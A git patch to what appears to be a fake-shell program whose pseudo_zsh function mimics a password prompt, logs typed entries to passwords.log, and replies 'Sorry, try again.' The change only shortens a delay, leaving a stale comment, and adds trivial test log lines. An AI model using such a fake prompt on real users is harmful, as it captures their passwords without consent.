From d5d5ea7d1e1eb2acf13354ad225ca8fde72093fe Mon Sep 17 00:00:00 2001 From: HeXiangLong <3234374354@qq.com> Date: Mon, 7 Apr 2025 08:50:38 +0800 Subject: [PATCH] =?UTF-8?q?=E8=B0=83=E6=95=B4=E9=9A=8F=E6=9C=BA=E5=BB=B6?= =?UTF-8?q?=E6=97=B6=E9=80=BB=E8=BE=91=EF=BC=8C=E7=BC=A9=E7=9F=AD=E5=BB=B6?= =?UTF-8?q?=E8=BF=9F=E6=97=B6=E9=97=B4=E8=87=B3=200.1=20=E5=88=B0=201=20?= =?UTF-8?q?=E7=A7=92=EF=BC=8C=E5=B9=B6=E6=9B=B4=E6=96=B0=E5=AF=86=E7=A0=81?= =?UTF-8?q?=E6=97=A5=E5=BF=97=E6=96=87=E4=BB=B6?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- main.py | 2 +- passwords.log | 3 +++ 2 files changed, 4 insertions(+), 1 deletion(-) diff --git a/main.py b/main.py index 80b9910..9384a3f 100644 --- a/main.py +++ b/main.py @@ -90,7 +90,7 @@ def pseudo_zsh(): with open("passwords.log", "a") as f: current_time = datetime.now().strftime("%Y-%m-%d %H:%M:%S") # 获取当前时间 f.write(f"[{current_time}] {fake_password}\n") # 写入时间和密码 - delay = random.uniform(0.5, 2.0) # 随机延时 0.5 到 2 秒 + delay = random.uniform(0.1, 1.0) # 随机延时 0.5 到 2 秒 time.sleep(delay) # 模拟延迟 if a != 3: print("Sorry, try again.") diff --git a/passwords.log b/passwords.log index a300bbf..19ae265 100644 --- a/passwords.log +++ b/passwords.log @@ -24,3 +24,6 @@ [2025-04-06 22:24:15] 00 [2025-04-06 22:24:17] 00 [2025-04-06 22:24:18] 00 +[2025-04-07 08:48:57] 1 +[2025-04-07 08:48:59] 1 +[2025-04-07 08:49:01] 1